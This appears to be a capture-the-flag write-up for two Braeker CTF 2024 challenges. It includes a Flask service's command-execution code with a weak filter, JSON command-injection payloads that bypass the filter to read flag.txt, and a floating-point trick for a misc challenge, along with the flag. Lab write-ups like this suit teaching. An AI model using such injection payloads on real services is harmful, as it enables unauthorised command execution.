Braeker CTF - 2024

2 challenges solved from Braeker CTF, web and misc

Empty execution - Web?

We are given a link that gives invalid method

from flask import Flask, jsonify, request
import os

app = Flask(__name__)
# Run commands from leaderbot
@app.route('/run_command', methods=['POST'])
def run_command():
    # Get command
    data = request.get_json()
    if 'command' in data:
        command = str(data['command'])
        # Length check
        if len(command) < 5:
            return jsonify({'message': 'Command too short'}), 501
        # Perform security checks
        if '..' in command or '/' in command:
            return jsonify({'message': 'Hacking attempt detected'}), 501
        # Find path to executable
        executable_to_run = command.split()[0]
        # Check if we can execute the binary
        if os.access(executable_to_run, os.X_OK):
            # Execute binary if it exists and is executable
            out = os.popen(command).read()
            return jsonify({'message': 'Command output: ' + str(out)}), 200
    return jsonify({'message': 'Not implemented'}), 501

if __name__ == '__main__':
    
    # Make sure we can only execute binaries in the executables directory
    os.chdir('./executables/')

    # Run server
    app.run(host='0.0.0.0', port=80)

Inspecting the code we notice that we need to submit a POST with a command as data, the command cannot have '/' or '..' and has to be executable. The first bypass of the executable file and the '..' :

{ 
"command":". test.txt| ls -la .\\."
}

This will run '.' ash bin/sh which is executable, now we execute a find statement, because flag.txt is one folder behind, we cannot cat

Command to cat flag:

{
"command":". test.txt | find .\\. -type f -name 'flag.txt' -exec cat {} \\;"
}

e - Misc

We needed to bypass 3 checks

The first one:

Welcome! 
Number that is equal to two: 
2.01 
Well done! 
This is the second round: 

The second one:

This is the second round: 
Number to add to 0.9 to make 1: 
0.0999999 
Great! Up to level three: 

And lastly, we needed to append to a random list two numbers that, adding all the list, we had 0 as a result of all the addition. The name of the challenge was some kind of a clue, as the big numbers noted with an e, helped us avoid the rest of the list interfering with the addition, because the whole number was not checked, only the first numbers with the e+?

That's why, the flag would return if the first number was something reaaaally big, and the second its negative.

$ nc 0.cloud.chals.io 30531 
Welcome! 
Number that is equal to two: 
2.01 
Well done! 
This is the second round: 
Number to add to 0.9 to make 1: 
0.0999999 
Great! Up to level three: 
Number to add to array to equal zero: 
2.0000e+23 
Number to add to array to equal zero: 
-2.0000e+23 
Well done! 
Here is the flag: brck{Th3_3pS1l0n_w0rkS_In_M15t3riOuS_W4yS}